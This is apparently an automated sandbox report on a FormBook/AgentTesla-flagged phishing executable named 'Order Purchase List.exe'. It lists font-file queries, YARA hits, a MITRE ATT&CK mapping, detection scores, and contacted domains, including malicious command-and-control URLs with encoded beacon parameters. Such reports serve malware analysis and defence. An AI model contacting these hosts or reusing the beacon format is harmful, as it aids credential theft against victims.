Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Order Purchase List.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading1	OS Credential Dumping	Security Software Discovery121	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Network Connections Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	System Information Discovery112	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Order Purchase List.exe	34%	Virustotal		Browse
Order Purchase List.exe	40%	Metadefender		Browse
Order Purchase List.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Order Purchase List.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
10.2.Order Purchase List.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.tiro.com:	0%	Avira URL Cloud	safe
http://schemas.mi	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/_-Y$y	0%	Avira URL Cloud	safe
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/boots	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/t(	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/a-e	0%	URL Reputation	safe
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/font-	0%	Avira URL Cloud	safe
http://www.founder.com.c	0%	URL Reputation	safe
http://www.fonts.comTF	0%	Avira URL Cloud	safe
http://www.tiro.comn	0%	URL Reputation	safe
http://www.auxiliacapitalpartnersllc.com/wp-login.php	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/;-	0%	Avira URL Cloud	safe
www.hottorchlighter.com/gnui/	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cnA	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Kal1	0%	Avira URL Cloud	safe
http://www.inatividigitali.com/gnui/?D81Ltve=MSRjHgM9j7I5HOqdL19ZieQAx0QZYnhjbVtYOT6RDGM9GDKuXhbXwP3ESIufbr/Me9Gt&v0=mjfD3V_	0%	Avira URL Cloud	safe
http://www.auxiliacapitalpartnersllc.com/gnui/?D81Ltve=jxkSMADL8om04CnCt2uvg3koohdaHD/94Z7CDjzCNfrBt1nbgpVJnnhJbuZar5zysKNA&v0=mjfD3V_	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnH$N	0%	Avira URL Cloud	safe
http://www.hottorchlighter.com/gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_	100%	Avira URL Cloud	malware
http://schemas.micr	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Verd	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/ito	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/images/fa	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/9	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.sandoll.co.krlea	0%	Avira URL Cloud	safe
http://fontfabrik.com:	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/e-c$	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fonts.comWe	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/4-2$	0%	Avira URL Cloud	safe
http://en.w5	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/commo	0%	Avira URL Cloud	safe
http://www.fonts.comnfB	0%	Avira URL Cloud	safe
http://www.sandoll.co.krC	0%	Avira URL Cloud	safe
http://www.fonts.com-u	0%	URL Reputation	safe
http://www.bigbigsea.com/gnui/?D81Ltve=+ILGKZDievfdlhE08A6+0Ox9ZT8Pbvv5JFHshEbNzSpcbgaG6QnGXyVZrWQJJYTOfSqp&v0=mjfD3V_	0%	Avira URL Cloud	safe
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/mad_desig	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
auxiliacapitalpartnersllc.com	68.178.221.206	true	true	unknown
inatividigitali.com	34.102.136.180	true	false	unknown
www.hottorchlighter.com	104.21.44.253	true	true	unknown
bigbigsea.com	154.23.204.56	true	true	unknown
www.inatividigitali.com	unknown	unknown	true	unknown
www.auxiliacapitalpartnersllc.com	unknown	unknown	true	unknown
www.greatamericanlandworks.com	unknown	unknown	true	unknown
www.bigbigsea.com	unknown	unknown	true	unknown
www.iphone13promax.show	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.hottorchlighter.com/gnui/	true	Avira URL Cloud: malware	low
http://www.inatividigitali.com/gnui/?D81Ltve=MSRjHgM9j7I5HOqdL19ZieQAx0QZYnhjbVtYOT6RDGM9GDKuXhbXwP3ESIufbr/Me9Gt&v0=mjfD3V_	false	Avira URL Cloud: safe	unknown
http://www.auxiliacapitalpartnersllc.com/gnui/?D81Ltve=jxkSMADL8om04CnCt2uvg3koohdaHD/94Z7CDjzCNfrBt1nbgpVJnnhJbuZar5zysKNA&v0=mjfD3V_	true	Avira URL Cloud: safe	unknown
http://www.hottorchlighter.com/gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_	true	Avira URL Cloud: malware	unknown
http://www.bigbigsea.com/gnui/?D81Ltve=+ILGKZDievfdlhE08A6+0Ox9ZT8Pbvv5JFHshEbNzSpcbgaG6QnGXyVZrWQJJYTOfSqp&v0=mjfD3V_	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.tiro.com:	Order Purchase List.exe, 00000000.00000003.273561425.00000000063FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.mi	explorer.exe, 0000000C.00000000.361157052.000000000EE50000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/_-Y$y	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/boots	NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/t(	Order Purchase List.exe, 00000000.00000003.274443384.00000000063E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/a-e	Order Purchase List.exe, 00000000.00000003.275879582.00000000063E4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.auxiliacapitalpartnersllc.com/wp-content/plugins/under-construction-page/themes/css/font-	NETSTAT.EXE, 00000013.00000002.543421309.00000000034F2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.c	Order Purchase List.exe, 00000000.00000003.274284669.00000000063E4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.comTF	Order Purchase List.exe, 00000000.00000003.272773101.00000000063FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
